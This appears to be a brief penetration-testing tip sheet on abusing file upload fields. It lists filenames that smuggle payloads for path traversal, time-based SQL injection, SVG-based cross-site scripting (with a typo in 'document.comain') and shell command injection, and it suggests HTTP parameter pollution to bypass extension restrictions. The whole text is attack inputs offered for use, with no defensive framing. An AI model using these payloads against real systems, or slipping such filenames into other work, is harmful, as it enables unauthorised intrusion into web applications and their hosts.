File Upload

Chaining file uploads with other vulns:-
Set filename to:-
> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.